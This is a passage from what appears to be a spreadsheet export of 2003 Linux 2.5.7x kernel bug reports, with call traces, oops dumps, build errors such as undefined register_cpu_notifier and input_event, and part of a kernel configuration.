[&lt;c0108bb7&gt;] __down_failed+0xb/0x14 [&lt;c0149e15&gt;] .text.lock.module+0xcd/0xe8 [&lt;c01629eb&gt;] vma_link+0xcb/0x1c0 [&lt;c01a4e61&gt;] seq_read+0x2f1/0x300 [&lt;c01a4c5b&gt;] seq_read+0xeb/0x300 [&lt;c0163532&gt;] do_mmap_pgoff+0x3e2/0x6c0 [&lt;c017559f&gt;] vfs_read+0xaf/0x120 [&lt;c017582f&gt;] sys_read+0x3f/0x60 [&lt;c010a4bb&gt;] syscall_call+0x7/0xb mozilla-bin D D7603D10 4262142560 4577 1 4586 4609 4573 (NOTLB) Call Trace: [&lt;c0121c7a&gt;] default_wake_function+0x2a/0x30 [&lt;c0122455&gt;] wait_for_completion+0x155/0x330 [&lt;c0121c50&gt;] default_wake_function+0x0/0x30 [&lt;c013d7db&gt;] queue_work+0x12b/0x1c0 [&lt;c0121c50&gt;] default_wake_function+0x0/0x30 [&lt;c013d6a1&gt;] call_usermodehelper+0x161/0x170 [&lt;c013d4d0&gt;] __call_usermodehelper+0x0/0x70 [&lt;c01cc7f1&gt;] ext3_lookup+0x1a1/0x340 [&lt;c013d1b6&gt;] request_module+0xd6/0x130 [&lt;dc894baf&gt;] soundcore_open+0x36f/0x610 [soundcore] [&lt;dc895210&gt;] +0x90/0xf6 [soundcore] [&lt;c01842a0&gt;] exact_match+0x0/0x10 [&lt;c0183aad&gt;] chrdev_open+0x21d/0x610 [&lt;c0176617&gt;] get_empty_filp+0x77/0x100 [&lt;c0173fb1&gt;] dentry_open+0x151/0x220 [&lt;c0173e56&gt;] filp_open+0x66/0x70 [&lt;c01898f3&gt;] getname+0x93/0xd0 [&lt;c0174675&gt;] sys_open+0x55/0x90 [&lt;c010a4bb&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>kernel compile chokes on xfrm</t>
  </si>
  <si>
    <t>2003-06-12 01:21 UTC</t>
  </si>
  <si>
    <t>Tom Magliery</t>
  </si>
  <si>
    <t>2003-09-19 08:44 UTC</t>
  </si>
  <si>
    <t>Ville Jutvik</t>
  </si>
  <si>
    <t>Distribution: running RHL9 Hardware Environment: Dell C640 Software Environment: running 2.4.20-18.9 Problem Description: when I try to compile the 2.5.70 kernel, it dies on xfrm. It doesn't help to deselect XFRM_USER. It may be a coincidence, but this didn't seem to be a problem until I installed module-init-tools (0.9.12). Steps to reproduce: It dies thusly: CC net/xfrm/xfrm_policy.o CC net/xfrm/xfrm_state.o CC net/xfrm/xfrm_input.o CC net/xfrm/xfrm_algo.o In file included from net/xfrm/xfrm_algo.c:16: include/net/ah.h: In function `ah_hmac_digest': include/net/ah.h:26: warning: implicit declaration of function `crypto_hmac_init' include/net/ah.h:27: `crypto_hmac_update' undeclared (first use in this function) include/net/ah.h:27: (Each undeclared identifier is reported only once include/net/ah.h:27: for each function it appears in.) include/net/ah.h:28: warning: implicit declaration of function `crypto_hmac_final' In file included from net/xfrm/xfrm_algo.c:19: include/net/esp.h: In function `esp_hmac_digest': include/net/esp.h:49: `crypto_hmac_update' undeclared (first use in this function) make[2]: *** [net/xfrm/xfrm_algo.o] Error 1 make[1]: *** [net/xfrm] Error 2 make: *** [net] Error 2</t>
  </si>
  <si>
    <t>umount an nfs volume hangs and oopses</t>
  </si>
  <si>
    <t>2.5.70+bk (around 14 Jun, 10:00 CET)</t>
  </si>
  <si>
    <t>2003-06-14 05:01 UTC</t>
  </si>
  <si>
    <t>2003-06-15 13:33 UTC</t>
  </si>
  <si>
    <t>Gentoo mount-2.11y, gcc-3.2.2, nfs-utils-1.0.3 NFS server: Debian/unstable, 2.4.20, nfs-kernel-server-1.0.3-1 NFS as module. Problem Description: An attempt to umount an NFS mountpoint hangs the machine for some time (some minutes), than umount oopses. Steps to reproduce: $ mount host:/oops /net/oops $ umount /net/oops umount R current 4290083808 4426 4416 (NOTLB) Call Trace: [&lt;dc919620&gt;] nfs_sops+0x0/0x60 [nfs] [&lt;dc8d635f&gt;] rpc_destroy_client+0x5f/0x90 [sunrpc] [&lt;dc903940&gt;] nfs_put_super+0x20/0x50 [nfs] [&lt;c017e99a&gt;] generic_shutdown_super+0x3da/0x440 [&lt;c010ae48&gt;] common_interrupt+0x18/0x20 [&lt;c01804e6&gt;] kill_anon_super+0x16/0x180 [&lt;c0157091&gt;] kmem_cache_free+0x1d1/0x2c0 [&lt;dc90660a&gt;] nfs_kill_super+0x1a/0x30 [nfs] [&lt;c017df1f&gt;] deactivate_super+0xcf/0x2b0 [&lt;c01a0ca8&gt;] free_vfsmnt+0x28/0x30 [&lt;dc919760&gt;] nfs_fs_type+0x0/0x20 [nfs] [&lt;c01a208c&gt;] sys_umount+0x3c/0xa0 [&lt;c0174d22&gt;] sys_close+0x102/0x230 [&lt;c01a2109&gt;] sys_oldumount+0x19/0x20 [&lt;c010a4db&gt;] syscall_call+0x7/0xb ... after a while, filled with chaotic pressings SysRq+t, SysRq+u, SysRq+... and boring copying the previous trace onto paper: Unable to handle kernel paging request at virtual address 00100104 printing eip: c019660e *pde = 00000000 Oops: 0002 [#1] CPU: 0 EIP: 0060:[&lt;c019660e&gt;] Not tainted EFLAGS: 00010246 EIP is at dput+0xee/0x680 eax: 00100100 ebx: db0f40a4 ecx: db0f40d0 edx: 00200200 esi: db0f41a4 edi: db0f40a4 ebp: db009e28 esp: db009e04 ds: 007b es: 007b ss: 0068 Process umount (pid: 4426, threadinfo=db008000 task=db4b0da0) Stack: db0f40a4 c031fe10 db0f40a4 db009e6c 00000010 ffff007b c019007b db0f40a4 db0f41a4 db009e6c dc8eddda db0f40a4 db0f40a4 db0f47d0 db009e88 00000000 db0b9804 db0f47d0 db0f41a4 db0b9284 db0f40d0 db0b9204 db0f412c db0f4170 Call Trace: [&lt;c019007b&gt;] file_ioctl+0xbb/0x190 [&lt;dc8eddda&gt;] rpc_depopulate+0x19a/0x2e0 [sunrpc] [&lt;dc8ee60c&gt;] rpc_rmdir+0xac/0xd0 [sunrpc] [&lt;dc919620&gt;] nfs_sops+0x0/0x60 [nfs] [&lt;dc8d635f&gt;] rpc_destroy_client+0x5f/0x90 [sunrpc] [&lt;dc903940&gt;] nfs_put_super+0x20/0x50 [nfs] [&lt;c017e99a&gt;] generic_shutdown_super+0x3da/0x440 [&lt;c010ae48&gt;] common_interrupt+0x18/0x20 [&lt;c01804e6&gt;] kill_anon_super+0x16/0x180 [&lt;c0157091&gt;] kmem_cache_free+0x1d1/0x2c0 [&lt;dc90660a&gt;] nfs_kill_super+0x1a/0x30 [nfs] [&lt;c017df1f&gt;] deactivate_super+0xcf/0x2b0 [&lt;c01a0ca8&gt;] free_vfsmnt+0x28/0x30 [&lt;dc919760&gt;] nfs_fs_type+0x0/0x20 [nfs] [&lt;c01a208c&gt;] sys_umount+0x3c/0xa0 [&lt;c0174d22&gt;] sys_close+0x102/0x230 [&lt;c01a2109&gt;] sys_oldumount+0x19/0x20 [&lt;c010a4db&gt;] syscall_call+0x7/0xb Code: 89 50 04 89 02 c7 41 04 00 02 20 00 81 7b 08 3c 4b 24 1d c7 &lt;6&gt;note: umount[4426] exited with preempt_count 3 bad: scheduling while atomic! Call Trace: [&lt;c0121d21&gt;] schedule+0x6e1/0x6f0 [&lt;c015ec5e&gt;] unmap_page_range+0x4e/0x80 [&lt;c015ee8e&gt;] unmap_vmas+0x1fe/0x360 [&lt;c0164be9&gt;] exit_mmap+0xc9/0x2c0 [&lt;c01252a3&gt;] mmput+0xb3/0x140 [&lt;c012b69f&gt;] do_exit+0x27f/0xaa0 [&lt;c010b68c&gt;] die+0x21c/0x220 [&lt;c011fa0d&gt;] do_page_fault+0x15d/0x4dc [&lt;c012dd66&gt;] tasklet_action+0x46/0x70 [&lt;c010d0a5&gt;] do_IRQ+0x255/0x3b0 [&lt;c010ae48&gt;] common_interrupt+0x18/0x20 [&lt;c011f8b0&gt;] do_page_fault+0x0/0x4dc [&lt;c010aee5&gt;] error_code+0x2d/0x38 [&lt;c019660e&gt;] dput+0xee/0x680 [&lt;c019007b&gt;] file_ioctl+0xbb/0x190 [&lt;dc8eddda&gt;] rpc_depopulate+0x19a/0x2e0 [sunrpc] [&lt;dc8ee60c&gt;] rpc_rmdir+0xac/0xd0 [sunrpc] [&lt;dc919620&gt;] nfs_sops+0x0/0x60 [nfs] [&lt;dc8d635f&gt;] rpc_destroy_client+0x5f/0x90 [sunrpc] [&lt;dc903940&gt;] nfs_put_super+0x20/0x50 [nfs] [&lt;c017e99a&gt;] generic_shutdown_super+0x3da/0x440 [&lt;c010ae48&gt;] common_interrupt+0x18/0x20 [&lt;c01804e6&gt;] kill_anon_super+0x16/0x180 [&lt;c0157091&gt;] kmem_cache_free+0x1d1/0x2c0 [&lt;dc90660a&gt;] nfs_kill_super+0x1a/0x30 [nfs] [&lt;c017df1f&gt;] deactivate_super+0xcf/0x2b0 [&lt;c01a0ca8&gt;] free_vfsmnt+0x28/0x30 [&lt;dc919760&gt;] nfs_fs_type+0x0/0x20 [nfs] [&lt;c01a208c&gt;] sys_umount+0x3c/0xa0 [&lt;c0174d22&gt;] sys_close+0x102/0x230 [&lt;c01a2109&gt;] sys_oldumount+0x19/0x20 [&lt;c010a4db&gt;] syscall_call+0x7/0xb</t>
  </si>
  <si>
    <t>register_cpu_notifier in flow.c causes fatal error during make</t>
  </si>
  <si>
    <t>2.5.71</t>
  </si>
  <si>
    <t>2003-06-14 21:39 UTC</t>
  </si>
  <si>
    <t>John M. Hall</t>
  </si>
  <si>
    <t>2004-07-18 04:24 UTC</t>
  </si>
  <si>
    <t>Problem Description: Make reports undefined reference to `register_cpu_notifier' when making net/built-in.o. Steps to reproduce: Compile with network support enabled and SMP disabled. The following appears in the make log: CC net/core/flow.o net/core/flow.c: In function `flow_cache_init': net/core/flow.c:374: warning: implicit declaration of function `register_cpu_notifier' LD net/core/built-in.o LD net/built-in.o GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD vmlinux net/built-in.o: In function `flow_cache_init': net/built-in.o(.init.text+0x292): undefined reference to `register_cpu_notifier' make: *** [vmlinux] Error 1 If SMP is enabled the warning about implicit declaration is issued, but the make completes. Possible resolution: Include &lt;linux/cpu.h&gt; in flow.c.</t>
  </si>
  <si>
    <t>Kernel build fails with error on net/built-in.o</t>
  </si>
  <si>
    <t>2003-06-15 04:56 UTC</t>
  </si>
  <si>
    <t>2003-06-16 12:07 UTC</t>
  </si>
  <si>
    <t>Distribution: slackware Hardware Environment: k7T master Software Environment: gcc 3.3 , glibc 2.3.1 Problem Description: kernel build fails with this error CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 net/built-in.o(.init.text+0x36e): In function `flow_cache_init': : undefined reference to `register_cpu_notifier' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: compile the kernel with the attached config file</t>
  </si>
  <si>
    <t>Kernel BUG at mm/slab.c:981</t>
  </si>
  <si>
    <t>2.5.70-71</t>
  </si>
  <si>
    <t>2003-06-15 11:01 UTC</t>
  </si>
  <si>
    <t>scott</t>
  </si>
  <si>
    <t>2003-06-15 16:32 UTC</t>
  </si>
  <si>
    <t>Since .69 I've been unable to boot. no config changes. I had to write this out and then type so if something looks really off it might be a typo, give a shout and I'll check it. Kernel BUG at mm/slab.c:981 invalid operand:0000 [#1] cpu: 0 EIP: 0060:[&lt;c0136eca&gt;] Not tainted Eflags: 00010202 eax: 000001a8 ebx:c053a5c0 ecx:c04ae990 edx:00001797 esi:00000000 edi:00000000 esp:c153ff6c ds:007b es:007b ss:0068 Process swapper (pid: 1, threadinfo=c153e000 task=c151d880) Stack: ffffe869 00000029 0000000292 0000176b 00001797 c0546829 00000246 c011b51e c053a5c0 00000000 00000000 00000000 c01d5046 c04464b8 000001a8 00000000 00000001 c01d4ff2 00000000 c0527e9c c0451f20 c053a5c0 c051cbbd 00000000 Call Trace [&lt;c011b51e&gt;] [&lt;c01d5046&gt;] [&lt;c01d4ff2&gt;] [&lt;c0527e9c&gt;] [&lt;c051c6bd&gt;] [&lt;c0128542&gt;] [&lt;c0105051&gt;] [&lt;c010502c&gt;] [&lt;c010895d&gt;] code: 0f 0b d5 03 60 28 44 c0 c7 44 24 04 d0 00 00 00 c7 04 24 e0 &lt;0&gt; Kernel panic: Attempted to kill init! 2.5.69 #1 Thu May 8 22:26:56 EDT 2003 i686 Intel(R) Pentium(R) 4 Mobile CPU 2.00GHz GenuineIntel GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z e2fsprogs 1.33 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.9 Net-tools 1.60 Kbd 1.06 Sh-utils 2.0.15 Modules Loaded nvidia processor : 0 vendor_id : GenuineIntel cpu family : 15 model : 2 model name : Intel(R) Pentium(R) 4 Mobile CPU 2.00GHz stepping : 4 cpu MHz : 1993.851 cache size : 512 KB fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm bogomips : 3940.35 /proc/ioports 0000-001f : dma1 0020-003f : pic1 0040-005f : timer 0060-006f : keyboard 0070-0077 : rtc 0080-008f : dma page reg 00a0-00bf : pic2 00c0-00df : dma2 00f0-00ff : fpu 01f0-01f7 : ide0 03c0-03df : vga+ 03f6-03f6 : ide0 0cf8-0cff : PCI conf1 1000-10ff : Intel Corp. 82801CA/CAM AC'97 Au 1000-10ff : Intel 82801CA-ICH3 - AC'97 1400-143f : Intel Corp. 82801CA/CAM AC'97 Au 1400-143f : Intel 82801CA-ICH3 - Controller 1480-14ff : Intel Corp. 82801CA/CAM AC'97 Mo 1800-18ff : Intel Corp. 82801CA/CAM AC'97 Mo 1c00-1cff : PCI CardBus #03 2000-20ff : PCI CardBus #03 2400-24ff : PCI CardBus #07 2800-28ff : PCI CardBus #07 cfa0-cfaf : Intel Corp. 82801CAM IDE U100 cfa0-cfa7 : ide0 cfa8-cfaf : ide1 df40-df7f : Intel Corp. 82801CAM (ICH3) PRO/ df40-df7f : e100 /proc/iomem 00000000-0009fbff : System RAM 0009fc00-0009ffff : reserved 000a0000-000bffff : Video RAM area 000e0000-000effff : Extension ROM 000f0000-000fffff : System ROM 00100000-1ffcbfff : System RAM 00100000-0044c0d8 : Kernel code 0044c0d9-0053d283 : Kernel data 1ffcc000-1ffcffff : reserved 1ffd0000-1ffdffff : ACPI Tables 1ffe0000-1fffffff : reserved 20000000-200003ff : Intel Corp. 82801CAM IDE U100 20000400-200004ff : NEC Corporation USB 2.0 20000400-200004ff : ehci-hcd 20000600-200007ff : Toshiba America Info SD TypA Controller 20000800-20000fff : Texas Instruments TSB43AB22/A IEEE-139 20000800-20000fff : ohci1394 20001000-20001fff : Texas Instruments PCI1410 PC card Card 20002000-20002fff : Toshiba America Info ToPIC95 PCI to Cardb 20004000-20007fff : Texas Instruments TSB43AB22/A IEEE-139 20400000-207fffff : PCI CardBus #03 20800000-20bfffff : PCI CardBus #03 20c00000-20ffffff : PCI CardBus #07 21000000-213fffff : PCI CardBus #07 d7f00000-dfffffff : PCI Bus #01 d7f80000-d7ffffff : PCI device 10de:0177 (nVidia Corporation) d8000000-dfffffff : PCI device 10de:0177 (nVidia Corporation) e0000000-efffffff : Intel Corp. 82845 845 (Brookdale fcefd000-fcefdfff : Intel Corp. 82801CAM (ICH3) PRO/ fcefd000-fcefdfff : e100 fcefe000-fcefefff : NEC Corporation USB (#2) fceff000-fcefffff : NEC Corporation USB fd000000-fdffffff : PCI Bus #01 fd000000-fdffffff : PCI device 10de:0177 (nVidia Corporation) feda0000-fedbffff : reserved ffb80000-ffbfffff : reserved fff80000-ffffffff : reserved</t>
  </si>
  <si>
    <t>2.5.71 compile fail</t>
  </si>
  <si>
    <t>2003-06-16 13:22 UTC</t>
  </si>
  <si>
    <t>Zack Schueller</t>
  </si>
  <si>
    <t>2003-07-15 21:21 UTC</t>
  </si>
  <si>
    <t>Distribution: Mandrake Linux 9.1 Hardware Environment: x86 Athlon Software Environment: GCC 3.2.2 Problem Description: 2.5.70 kernel patched to 2.5.71 per the included README fails to compile. $make bzImage make[1]: `arch/i386/kernel/asm-offsets.s' is up to date. CHK include/linux/compile.h GEN .version CHK include/linux/compile.h UPD include/linux/compile.h CC init/version.o LD init/built-in.o LD .tmp_vmlinux1 drivers/built-in.o(.text+0x9f05f): In function `hidinput_hid_event': : undefined reference to `input_event' drivers/built-in.o(.text+0x9f0ee): In function `hidinput_hid_event': : undefined reference to `input_event' drivers/built-in.o(.text+0x9f14f): In function `hidinput_hid_event': : undefined reference to `input_event' drivers/built-in.o(.text+0x9f1e2): In function `hidinput_hid_event': : undefined reference to `input_event' drivers/built-in.o(.text+0x9f240): In function `hidinput_report_event': : undefined reference to `input_event' drivers/built-in.o(.text+0x9f46f): In function `hidinput_connect': : undefined reference to `input_register_device' drivers/built-in.o(.text+0x9f48c): In function `hidinput_connect': : undefined reference to `input_register_device' drivers/built-in.o(.text+0x9f607): In function `hidinput_disconnect': : undefined reference to `input_unregister_device' drivers/built-in.o(.text+0x9f09d): In function `hidinput_hid_event': : undefined reference to `input_event' sound/built-in.o(.text+0x1a303): In function `snd_rawmidi_dev_register': : undefined reference to `snd_seq_device_new' sound/built-in.o(.text+0x1bf89): In function `snd_opl3_hwdep_new': : undefined reference to `snd_seq_device_new' sound/built-in.o(.text+0x1cbc7): In function `snd_opl3_synth_event_input': : undefined reference to `snd_seq_instr_event' sound/built-in.o(.text+0x1cbe3): In function `snd_opl3_synth_event_input': : undefined reference to `snd_midi_process_event' sound/built-in.o(.text+0x1cc3d): In function `snd_opl3_synth_create_port': : undefined reference to `snd_midi_channel_alloc_set' sound/built-in.o(.text+0x1ccef): In function `snd_opl3_synth_create_port': : undefined reference to `snd_seq_event_port_attach' sound/built-in.o(.text+0x1cd0e): In function `snd_opl3_synth_create_port': : undefined reference to `snd_midi_channel_free_set' sound/built-in.o(.text+0x1cd7b): In function `snd_opl3_seq_new_device': : undefined reference to `snd_seq_create_kernel_client' sound/built-in.o(.text+0x1cdf5): In function `snd_opl3_seq_new_device': : undefined reference to `snd_seq_kernel_client_ctl' sound/built-in.o(.text+0x1ce02): In function `snd_opl3_seq_new_device': : undefined reference to `snd_seq_instr_list_new' sound/built-in.o(.text+0x1ce17): In function `snd_opl3_seq_new_device': : undefined reference to `snd_seq_delete_kernel_client' sound/built-in.o(.text+0x1ce4b): In function `snd_opl3_seq_new_device': : undefined reference to `snd_seq_fm_init' sound/built-in.o(.text+0x1cebe): In function `snd_opl3_seq_delete_device': : undefined reference to `snd_seq_delete_kernel_client' sound/built-in.o(.text+0x1cede): In function `snd_opl3_seq_delete_device': : undefined reference to `snd_seq_instr_list_free' sound/built-in.o(.text+0x1cbfe): In function `snd_opl3_synth_free_port': : undefined reference to `snd_midi_channel_free_set' sound/built-in.o(.text+0x1d34a): In function `snd_opl3_note_on': : undefined reference to `snd_seq_instr_find' sound/built-in.o(.text+0x1d73f): In function `snd_opl3_note_on': : undefined reference to `snd_seq_instr_free_use' sound/built-in.o(.text+0x1d9e3): In function `snd_opl3_note_on': : undefined reference to `snd_seq_instr_free_use' sound/built-in.o(.text+0x1e224): In function `snd_opl3_oss_event_input': : undefined reference to `snd_midi_process_event' sound/built-in.o(.text+0x1e279): In function `snd_opl3_oss_create_port': : undefined reference to `snd_midi_channel_alloc_set' sound/built-in.o(.text+0x1e313): In function `snd_opl3_oss_create_port': : undefined reference to `snd_seq_event_port_attach' sound/built-in.o(.text+0x1e332): In function `snd_opl3_oss_create_port': : undefined reference to `snd_midi_channel_free_set' sound/built-in.o(.text+0x1e380): In function `snd_opl3_init_seq_oss': : undefined reference to `snd_seq_device_new' sound/built-in.o(.text+0x1e6d3): In function `snd_opl3_load_patch_seq_oss': : undefined reference to `snd_seq_instr_event' sound/built-in.o(.text+0x1e75a): In function `snd_opl3_load_patch_seq_oss': : undefined reference to `snd_seq_instr_event' sound/built-in.o(.text+0x1e23e): In function `snd_opl3_oss_free_port': : undefined reference to `snd_midi_channel_free_set' sound/built-in.o(.exit.text+0x32e): In function `alsa_opl3_seq_exit': : undefined reference to `snd_seq_device_unregister_driver' sound/built-in.o(.init.text+0x71e): In function `alsa_opl3_seq_init': : undefined reference to `snd_seq_device_register_driver' net/built-in.o(.init.text+0x20e): In function `flow_cache_init': : undefined reference to `register_cpu_notifier' make: *** [.tmp_vmlinux1] Error 1 Steps to reproduce: Here's the config file produced by xconfig # # Automatically generated make config: don't edit # CONFIG_X86=y CONFIG_MMU=y CONFIG_UID16=y CONFIG_GENERIC_ISA_DMA=y # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # General setup # CONFIG_SWAP=y CONFIG_SYSVIPC=y CONFIG_BSD_PROCESS_ACCT=y CONFIG_SYSCTL=y CONFIG_LOG_BUF_SHIFT=14 # CONFIG_EMBEDDED is not set CONFIG_FUTEX=y CONFIG_EPOLL=y # # Loadable module support # CONFIG_MODULES=y CONFIG_MODULE_UNLOAD=y # CONFIG_MODULE_FORCE_UNLOAD is not set CONFIG_OBSOLETE_MODPARM=y CONFIG_MODVERSIONS=y CONFIG_KMOD=y # # Processor type and features # CONFIG_X86_PC=y # CONFIG_X86_VOYAGER is not set # CONFIG_X86_NUMAQ is not set # CONFIG_X86_SUMMIT is not set # CONFIG_X86_BIGSMP is not set # CONFIG_X86_VISWS is not set # CONFIG_X86_GENERICARCH is not set # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set # CONFIG_M586TSC is not set # CONFIG_M586MMX is not set # CONFIG_M686 is not set # CONFIG_MPENTIUMII is not set # CONFIG_MPENTIUMIII is not set # CONFIG_MPENTIUM4 is not set # CONFIG_MK6 is not set CONFIG_MK7=y # CONFIG_MK8 is not set # CONFIG_MELAN is not set # CONFIG_MCRUSOE is not set # CONFIG_MWINCHIPC6 is not set # CONFIG_MWINCHIP2 is not set # CONFIG_MWINCHIP3D is not set # CONFIG_MCYRIXIII is not set # CONFIG_MVIAC3_2 is not set # CONFIG_X86_GENERIC is not set CONFIG_X86_CMPXCHG=y CONFIG_X86_XADD=y CONFIG_X86_L1_CACHE_SHIFT=6 CONFIG_RWSEM_XCHGADD_ALGORITHM=y CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_GOOD_APIC=y CONFIG_X86_INTEL_USERCOPY=y CONFIG_X86_USE_PPRO_CHECKSUM=y CONFIG_X86_USE_3DNOW=y # CONFIG_HUGETLB_PAGE is not set # CONFIG_SMP is not set CONFIG_PREEMPT=y CONFIG_X86_UP_APIC=y CONFIG_X86_UP_IOAPIC=y CONFIG_X86_LOCAL_APIC=y CONFIG_X86_IO_APIC=y CONFIG_X86_TSC=y CONFIG_X86_MCE=y # CONFIG_X86_MCE_NONFATAL is not set # CONFIG_X86_MCE_P4THERMAL is not set # CONFIG_TOSHIBA is not set # CONFIG_I8K is not set # CONFIG_MICROCODE is not set CONFIG_X86_MSR=m # CONFIG_X86_CPUID is not set # CONFIG_EDD is not set CONFIG_NOHIGHMEM=y # CONFIG_HIGHMEM4G is not set # CONFIG_HIGHMEM64G is not set # CONFIG_MATH_EMULATION is not set CONFIG_MTRR=y CONFIG_HAVE_DEC_LOCK=y # # Power management options (ACPI, APM) # CONFIG_PM=y CONFIG_SOFTWARE_SUSPEND=y # # ACPI Support # CONFIG_ACPI=y # CONFIG_ACPI_HT_ONLY is not set CONFIG_ACPI_BOOT=y CONFIG_ACPI_SLEEP=y CONFIG_ACPI_SLEEP_PROC_FS=y # CONFIG_ACPI_AC is not set # CONFIG_ACPI_BATTERY is not set # CONFIG_ACPI_BUTTON is not set CONFIG_ACPI_FAN=m CONFIG_ACPI_PROCESSOR=m # CONFIG_ACPI_THERMAL is not set # CONFIG_ACPI_TOSHIBA is not set # CONFIG_ACPI_DEBUG is not set CONFIG_ACPI_BUS=y CONFIG_ACPI_INTERPRETER=y CONFIG_ACPI_EC=y CONFIG_ACPI_POWER=y CONFIG_ACPI_PCI=y CONFIG_ACPI_SYSTEM=y CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set CONFIG_APM_DO_ENABLE=y CONFIG_APM_CPU_IDLE=y # CONFIG_APM_DISPLAY_BLANK is not set CONFIG_APM_RTC_IS_GMT=y # CONFIG_APM_ALLOW_INTS is not set # CONFIG_APM_REAL_MODE_POWER_OFF is not set # # CPU Frequency scaling # # CONFIG_CPU_FREQ is not set # # Bus options (PCI, PCMCIA, EISA, MCA, ISA) # CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y # CONFIG_PCI_LEGACY_PROC is not set CONFIG_PCI_NAMES=y CONFIG_ISA=y # CONFIG_EISA is not set # CONFIG_MCA is not set # CONFIG_SCx200 is not set CONFIG_HOTPLUG=y # # PCMCIA/CardBus support # # CONFIG_PCMCIA is not set CONFIG_PCMCIA_PROBE=y # # PCI Hotplug Support # # CONFIG_HOTPLUG_PCI is not set # # Executable file formats # CONFIG_KCORE_ELF=y # CONFIG_KCORE_AOUT is not set # CONFIG_BINFMT_AOUT is not set CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y # # Memory Technology Devices (MTD) # # CONFIG_MTD is not set # # Parallel port support # CONFIG_PARPORT=y CONFIG_PARPORT_PC=m CONFIG_PARPORT_PC_CML1=m # CONFIG_PARPORT_SERIAL is not set CONFIG_PARPORT_PC_FIFO=y CONFIG_PARPORT_PC_SUPERIO=y # CONFIG_PARPORT_OTHER is not set CONFIG_PARPORT_1284=y # # Plug and Play support # CONFIG_PNP=y CONFIG_PNP_NAMES=y # CONFIG_PNP_DEBUG is not set # # Protocols # # CONFIG_ISAPNP is not set CONFIG_PNPBIOS=y # # Block devices # # CONFIG_BLK_DEV_FD is not set # CONFIG_BLK_DEV_XD is not set # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_CPQ_CISS_DA is not set # CONFIG_BLK_DEV_DAC960 is not set # CONFIG_BLK_DEV_UMEM is not set CONFIG_BLK_DEV_LOOP=m CONFIG_BLK_DEV_NBD=m # CONFIG_BLK_DEV_RAM is not set CONFIG_BLK_DEV_INITRD=y # CONFIG_LBD is not set # # ATA/ATAPI/MFM/RLL device support # CONFIG_IDE=y # # IDE, ATA and ATAPI Block devices # CONFIG_BLK_DEV_IDE=y # # Please see Documentation/ide.txt for help/info on IDE drives # # CONFIG_BLK_DEV_HD_IDE is not set # CONFIG_BLK_DEV_HD is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_IDEDISK_MULTI_MODE=y # CONFIG_IDEDISK_STROKE is not set CONFIG_BLK_DEV_IDECD=y CONFIG_BLK_DEV_IDEFLOPPY=y CONFIG_BLK_DEV_IDESCSI=m CONFIG_IDE_TASK_IOCTL=y # # IDE chipset support/bugfixes # # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_IDEPNP is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_GENERIC=y CONFIG_IDEPCI_SHARE_IRQ=y CONFIG_BLK_DEV_IDEDMA_PCI=y # CONFIG_BLK_DEV_IDE_TCQ is not set # CONFIG_BLK_DEV_OFFBOARD is not set # CONFIG_BLK_DEV_IDEDMA_FORCED is not set CONFIG_IDEDMA_PCI_AUTO=y # CONFIG_IDEDMA_ONLYDISK is not set CONFIG_BLK_DEV_IDEDMA=y # CONFIG_IDEDMA_PCI_WIP is not set CONFIG_BLK_DEV_ADMA=y # CONFIG_BLK_DEV_AEC62XX is not set # CONFIG_BLK_DEV_ALI15X3 is not set # CONFIG_BLK_DEV_AMD74XX is not set # CONFIG_BLK_DEV_CMD64X is not set # CONFIG_BLK_DEV_TRIFLEX is not set # CONFIG_BLK_DEV_CY82C693 is not set # CONFIG_BLK_DEV_CS5520 is not set # CONFIG_BLK_DEV_HPT34X is not set # CONFIG_BLK_DEV_HPT366 is not set # CONFIG_BLK_DEV_SC1200 is not set # CONFIG_BLK_DEV_PIIX is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_PDC202XX_OLD is not set # CONFIG_BLK_DEV_PDC202XX_NEW is not set # CONFIG_BLK_DEV_RZ1000 is not set # CONFIG_BLK_DEV_SVWKS is not set # CONFIG_BLK_DEV_SIIMAGE is not set # CONFIG_BLK_DEV_SIS5513 is not set # CONFIG_BLK_DEV_SLC90E66 is not set # CONFIG_BLK_DEV_TRM290 is not set CONFIG_BLK_DEV_VIA82CXXX=y # CONFIG_IDE_CHIPSETS is not set CONFIG_IDEDMA_AUTO=y # CONFIG_IDEDMA_IVB is not set CONFIG_BLK_DEV_IDE_MODES=y # # SCSI device support # CONFIG_SCSI=m # # SCSI support type (disk, tape, CD-ROM) # CONFIG_BLK_DEV_SD=m # CONFIG_CHR_DEV_ST is not set # CONFIG_CHR_DEV_OSST is not set # CONFIG_BLK_DEV_SR is not set CONFIG_CHR_DEV_SG=m # # Some SCSI devices (e.g. CD jukebox) support multiple LUNs # # CONFIG_SCSI_MULTI_LUN is not set # CONFIG_SCSI_REPORT_LUNS is not set # CONFIG_SCSI_CONSTANTS is not set # CONFIG_SCSI_LOGGING is not set # # SCSI low-level drivers # # CONFIG_BLK_DEV_3W_XXXX_RAID is not set # CONFIG_SCSI_7000FASST is not set # CONFIG_SCSI_ACARD is not set # CONFIG_SCSI_AHA152X is 